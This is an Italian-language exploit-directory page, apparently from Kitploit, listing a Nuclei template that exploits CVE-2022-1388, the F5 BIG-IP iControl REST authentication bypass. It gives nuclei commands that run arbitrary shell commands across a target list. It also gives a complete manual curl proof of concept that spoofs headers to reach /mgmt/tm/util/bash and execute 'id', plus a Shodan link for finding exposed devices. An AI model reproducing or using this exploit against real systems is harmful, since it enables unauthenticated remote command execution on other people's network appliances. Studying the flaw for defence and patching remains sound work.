Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 è una vulnerabilità di bypass dell'autenticazione nel componente REST dell'API iControl di BIG-IP a cui è stato assegnato un punteggio CVSSv3 di 9.8. L'API REST iControl viene utilizzata per la gestione e la configurazione dei dispositivi BIG-IP. CVE-2022-1388 potrebbe essere sfruttata da un attaccante non autenticato con accesso di rete alla porta di gestione o agli indirizzi IP propri dei dispositivi che utilizzano BIG-IP. Lo sfruttamento consentirebbe all'attaccante di eseguire comandi arbitrari del sistema, creare e cancellare file e disabilitare servizi. | Kitploit
Strumenti/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

Vedi Repository
624 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2022-1388 è una vulnerabilità di bypass dell'autenticazione nel componente REST dell'API iControl di BIG-IP a cui è stato assegnato un punteggio CVSSv3 di 9.8. L'API REST iControl viene utilizzata per la gestione e la configurazione dei dispositivi BIG-IP. CVE-2022-1388 potrebbe essere sfruttata da un attaccante non autenticato con accesso di rete alla porta di gestione o agli indirizzi IP propri dei dispositivi che utilizzano BIG-IP. Lo sfruttamento consentirebbe all'attaccante di eseguire comandi arbitrari del sistema, creare e cancellare file e disabilitare servizi.

Condividi

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Parametro Comando

CVE-2022-1388 è una vulnerabilità di bypass dell'autenticazione nel componente REST dell'API iControl di BIG-IP a cui è stato assegnato un punteggio CVSSv3 di 9.8. L'API REST iControl è utilizzata per la gestione e la configurazione dei dispositivi BIG-IP. CVE-2022-1388 potrebbe essere sfruttata da un attaccante non autenticato con accesso di rete alla porta di gestione o agli indirizzi IP self dei dispositivi che utilizzano BIG-IP. Lo sfruttamento consentirebbe all'attaccante di eseguire comandi di sistema arbitrari, creare ed eliminare file e disabilitare servizi.

Questo template utilizza token-spray / variabile CLI di nuclei

Questo nuclei-template accetta parametri shell per lo sfruttamento. Volevamo testare token ottenuti da un altro workflow o da una ricerca manuale, quindi abbiamo utilizzato la funzionalità di variabile CLI di nuclei per alimentare dinamicamente un singolo valore di token o una lista di token in questi template al momento dell'esecuzione

-V, -var value variabili personalizzate in formato var=valore

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Screenshot del 2022-05-10 01-28-12

POC Manuale

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Dettagli Aggiuntivi

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

Riferimenti

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
Scarica lo strumento